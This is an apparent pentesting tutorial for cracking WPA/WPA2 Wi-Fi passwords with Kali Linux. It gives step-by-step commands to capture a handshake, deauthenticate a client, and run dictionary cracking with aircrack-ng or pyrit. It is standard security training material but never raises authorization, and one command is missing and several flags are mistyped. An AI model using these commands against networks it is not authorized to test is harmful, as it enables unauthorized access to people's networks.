Ready to Start Your Career?

Pentest WPA / WPA2 Encryption with Kali

Klimdy 's profile image

By: Klimdy

April 24, 2017

Pentest WPA / WPA2 Encryption with Kali

Hello and welcome to this tutorial!

Please note: All tests were carried out on the MacBook Air with installed Kali Linux and Wi-Fi Adapter TP-LINK TL-WN722N.

Step 1:

The first step of this tutorial concerns the checking operability the network interface of wi-fi adapterOpen a Terminal and type the following command:


In our case, we see two interfaces. Lo Interface does not interest us because we work with wlan0 in the Mode: Managed.

Step 2:

Once we have verified that the Wi-Fi adapter is working, we need to scan the available Wi-Fi networks. To scan, enter the following command:

iwlist wlan0 scanning

After the command, you will see a list of available wi-fi networks, among which you choose the desired network for an attack.

Important: Address / ESSID / Channel

Step 3:

Now we need to translate your network interface in monitor mode. Type the following command:

airmon-ng start wlan0

Now wlan0 interface will be named wlan0mon.

Step 4:

On selected network Wi-Fi, we have to capture a handshake. To capture we enter the command:

Airodump-ng wlan0mon –bssid 14:3E:BF:F0:66:0E –channel 6 –write handshake –wps


wlan0mon – interface namebssid 14:3E:BF:F0:66:0E – MAC-address of the routerchannel 6 – channel restrictionwrite handshake – record the captured information into a file named handshake wps – show the presence of WPS

Important: BSSID / STATION

Step 5:

Please note: If the upper right corner you have the inscription WPA handshake: Mac-address, then you can skip this step.

Handshake occurs only when the client connects to the access point. You can wait until the new client will be connected to the network, but we reconnected selected customer.

We need to work without closing the terminal. Open a new terminal and type in it the following command:

aireplay-ng -0 10 –a 14:3E:BF:F0:66:0E –c 28:37:37:EA:E6:08 wlan0mon


-0 —reconnected

10 – the number of reconnections

-a 14:3E:BF:F0:66:0E – MAC address of the access point

–c 28:37:37:EA:E6:08 – MAC address of the client

wlan0mon – use interface

If successful, we will see in the first terminal the handshake in the upper right corner

Close the second terminal and in the first terminal stop scanning operation by pressing the key combination Ctrl + C.

Step 6:

Now we need to check the captured handshake. Enter the following command in the terminal:

cowpatty -r handshake-01.cap -c


-r – It indicates the file that you want to test

handshake-01.cap – filename which contains the network activity

-с – it indicates that we need to check the handshake and not break it

We see that all of the data to decrypt Handshake we have.

Step 7:

There are two methods of decoding, using CPU or GPU. If you have a powerful graphics card, faster using GPU. In addition, we need a dictionary containing passwords.

To decrypt using the CPU, enter the following command:

aircrack-ng handshake-01.cap –w rockyou.txt


handshake-01.cap – file with handshake

-w rockyou.txt – dictionary with passwords

If the password is in the dictionary, then after a while you will see a message with a password.


To decrypt using the GPU, enter the following command:

pyrit –r handshake-01.cap –i rockyou.txt attack_passthrough

If the password is in the dictionary, then after a while you will see a message with a password.

I hope this tutorial is useful to you.

Schedule Demo